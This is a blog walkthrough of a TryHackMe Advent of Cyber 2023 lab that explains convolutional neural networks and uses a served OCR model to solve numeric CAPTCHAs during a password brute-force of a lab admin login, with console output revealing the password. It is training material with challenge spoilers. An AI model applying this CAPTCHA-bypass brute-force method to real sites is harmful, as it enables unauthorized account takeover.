Day 16 – ML CAPTCHA automation – Advent of Cyber 2023 – TryHackMe Challenge

Day 16 in the Advent of Cyber 2023. McGreedy has locked McSkidy out of his Elf(TM) HQ admin panel by changing the password! To make it harder for McSkidy to perform a hack-back, McGreedy has altered the admin panel login so that it uses a CAPTCHA to prevent automated attacks. A CAPTCHA is a small test, like providing the numbers in an image, that needs to be performed to ensure that you are a human. This means McSkidy can’t perform a brute force attack. Or does it?
After the great success of using machine learning to detect defective toys and phishing emails, McSkidy is looking to you to help him build a custom brute force script that will make use of ML to solve the CAPTCHA and continue with the brute force attack. There is, however, a bit of irony in having a machine solve a challenge specifically designed to tell humans apart from computers.

WARNING: Spoilers and challenge-answers are provided in the following writeup.
Official walk-through video is as well available at Youtube - Alh4zr3d.

Day 16 - Can't CAPTCHA this Machine!

Working further upon the last days challenges, we're today presented with more complex neural network structures. Convolutional Neural Networks (CNN) are a type of ML structures that have the ability to perform the feature extraction from a dataset by itself. This can be very beneficial when working with optical character recognition or understanding what's in pictures etc.
When scanning an image, CNN performs "convolution" meaning that is summarises the image into a smaller subset - this is "simply" done by creating a "kernel matrix" that slides across the height and width of the image and calculate a summary of the pixels. This reduces the number of pixels into summaries smaller than the original dataset (the pixels). To further optimize CNN then performs "Pooling". This is another step with the aim to produce a smaller feature-set for the ML to work in. This is done by summarising further down - either by filtering on highest value, lowest value, calculate an average, or some other algorithm.
These features are then feed as input to the ML model like we saw yesterday and the day before.

The Challenge

Firstly, we're asked a few questions about the usage of CNN in ML. The key process of training a neural network taken care of by using a CNN is "Feature Extraction" as this is part of the modeling. The process within CNN that does this is called "Convolution", while the process of reducing the amount of features is called "Pooling".
In the particular challenge for today an off-the-shelf CNN is used to train a CAPTCHA-cracking OCR model, which is Attention OCR.

We're now tasked to bruteforce us into a logon page within the provided machine.

Logon formular

But as seen, this is using a numerical CAPTCHA making other bruteforcing systems a dead-end. Though, a CNN training model for OCR recognition has been trained. For us to utilize this model, we need to extract the model and serve it using tensorflow.
As seen in the below console-extract, we can see that we start up to docker contained used for the model training, entering it with a console and then copying the exported model-data to the attached directory. We then exits the docker container console and stop the container again.

ubuntu@tryhackme:~/Desktop$ docker run -d -v /tmp/data:/tempdir/ aocr/full
dcd58c5f819cd3b2f1ba24a06382f6cbb82a8a274251d234cb5753e4d8e396af
ubuntu@tryhackme:~/Desktop$ docker ps
CONTAINER ID   IMAGE                COMMAND                  CREATED         STATUS         PORTS                                                 NAMES
dcd58c5f819c   aocr/full            "/run_jupyter.sh --a…"   6 seconds ago   Up 4 seconds   6006/tcp, 8888/tcp                                    happy_bell
ubuntu@tryhackme:~/Desktop$ docker exec -it dcd58c5f819c /bin/bash
root@dcd58c5f819c:/ocr# cp -r model /tempdir/
root@dcd58c5f819c:/ocr# exit
exit
ubuntu@tryhackme:~/Desktop$ docker kill dcd58c5f819c
dcd58c5f819c
ubuntu@tryhackme:~/Desktop$ docker ps
CONTAINER ID   IMAGE                COMMAND                  CREATED          STATUS          PORTS                                                 NAMES

We then need to serve the model for usage using tensorflow, which is performed via a docker container. This gives us an endpoint at http://localhost:8501/v1/models/ocr we can use to get predictions on what numbers (and their sequence) might be in the CAPTCHA.

ubuntu@tryhackme:~/Desktop$ docker run -t --rm -p 8501:8501 -v /tmp/data/model/exported-model:/models/ -e MODEL_NAME=ocr tensorflow/serving

At the provided machine, we're given a python script bruteforce.py as well as a passwords.txt list used in the bruteforce attempt. Running this script, we can see in the console extract below, runs through all possibilities and only try the test the CAPTCHA if the ML model is fairly confident in its prediction.

ubuntu@tryhackme:~/Desktop/bruteforcer$ python3 bruteforce.py 
[-] Invalid credential pair -- Username: admin Password: Spring2017
[-] Invalid credential pair -- Username: admin Password: Spring2021
[-] Invalid credential pair -- Username: admin Password: spring2021
[-] Invalid credential pair -- Username: admin Password: Summer2021
[-] Invalid credential pair -- Username: admin Password: summer2021
[-] Invalid credential pair -- Username: admin Password: Fall2021
[-] Prediction probability too low, not submitting CAPTCHA
[-] Invalid credential pair -- Username: admin Password: fall2021
[-] Invalid credential pair -- Username: admin Password: Winter2021
[-] Invalid credential pair -- Username: admin Password: winter2021
[-] Invalid credential pair -- Username: admin Password: Summer2019
[-] Invalid credential pair -- Username: admin Password: summer2019
[-] Invalid credential pair -- Username: admin Password: Autumn2019
[...REMOVED FOR BREVITY...]
[-] Invalid credential pair -- Username: admin Password: adminadmin
[-] Prediction probability too low, not submitting CAPTCHA
[-] Invalid credential pair -- Username: admin Password: admins
[-] Invalid credential pair -- Username: admin Password: goat
[-] Invalid credential pair -- Username: admin Password: sysadmin
[-] Invalid credential pair -- Username: admin Password: water
[-] Invalid credential pair -- Username: admin Password: dirt
[-] Invalid credential pair -- Username: admin Password: air
[-] Invalid credential pair -- Username: admin Password: earth
[+] Access Granted!! -- Username: admin Password: ReallyNotGonnaGuessThis
ubuntu@tryhackme:~/Desktop/bruteforcer$

And by that, we gained the used password via bruteforcing even though a CAPTCHA was introduced at the login-page. For the last question we need to used the credentials and logon the page to retrieve the flag.

Website flag

Leave a Reply

Your email address will not be published. Required fields are marked *